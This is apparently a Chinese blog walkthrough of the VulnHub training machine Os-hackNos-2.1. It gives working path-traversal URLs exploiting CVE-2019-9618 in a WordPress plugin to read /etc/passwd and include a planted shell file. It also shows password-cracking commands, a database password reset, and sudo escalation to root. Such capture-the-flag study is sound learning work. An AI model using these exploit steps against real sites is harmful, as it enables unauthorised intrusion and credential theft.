No.49-VulnHub-hackNos: Os-hackNos-2.1-Walkthrough渗透学习

**

VulnHub-hackNos: Os-hackNos-2.1-Walkthrough

**

靶机地址：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
靶机难度：容易+中级（CTF）
靶机发布日期：2019年11月29日
靶机描述：
Difficulty : Easy to Intermediate
Flag : 2 Flag first user And second root
Learning : Web Application | Enumeration | Password Cracking
Changelog - 2019-12-13 ~ v1.1 - 2019-11-29 ~ v1.0
作者：大余
时间：2020-02-09
请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

我们已经找到了此次CTF目标计算机IP地址：192.168.56.144

nmap发现开放了22、80端口…这里和1一样的…
前面做了1之后…直接爆破把…

发现tsweb目录…往下看可以发现，这是wordpress CMS架构的，可以使用wpscan…

直接上wpscan先…

熟悉的gracemedia-media-player插件…谷歌查找下…


可以利用CVE-2019-9618漏洞渗透…链接


命令：http://192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
发现flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/
这是哈希值…john爆破下…

命令：john --wordlist=/usr/share/wordlists/rockyou.txt dayu
命令：john --show dayu
获得账号和密码：flag，topsecret

二、提权

方法1

成功登录…

注意这里是受限制的，提到TTY即可…

没权限使用此命令…那就只能root查看了，跳过…

这里找了半天，才发现backups下有个pass…应该是密码…发现了MD5值…
$1$rohit$01Dl0NQKtgfeL08fGrggi0

john爆破密码：!%hack41

拿到第一个flag…

ALL…提权就是…

前面id可以查看到可执行sudo…直接sudo su提权到root用户，并查看第二个flag…

方法2

前面通过查看pass文件直接获得密码…然后sudo提权…
这边我利用数据看看…GO

前面获得flag方法一样…继续提root权限…
一路跟着我学习过来的都知道，查看数据库需要找到wp-config.php文件…里面包含了数据库账号密码…找它！！

一般都在html目录下面查找…找到了…

发现用户名密码：wpuser、hackNos-2.com

命令：mysql -h localhost -uwpuser -phackNos-2.com
发现：$P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2/


解密不出，跳过跳过…等了半天半天，最后也没解密出来…

命令：update wp_users set user_pass=md5("dayu") where user_login='user';
这里我直接使用命令，虽然破解不了，我将user用户密码修改为dayu

成功通过用户密码：user/dayu，登陆进入…

进来后，很熟悉的界面了，这里直接利用即可…

将dayushell复制进来…利用readme.txt即可…

然后利用之前的LFI漏洞包含该txt文件即可…记得本地开启nc…
命令：192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../var/www/html/tsweb/wp-content/themes/twentytwenty/readme.txt

看来只能获得www-data权限…这边继续往下走就能获得root…不过这是一个思路，可能还有别的方法…如果有请告诉我，谢啦！！

凌晨文章…

由于我们已经成功得到root权限查看flag，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。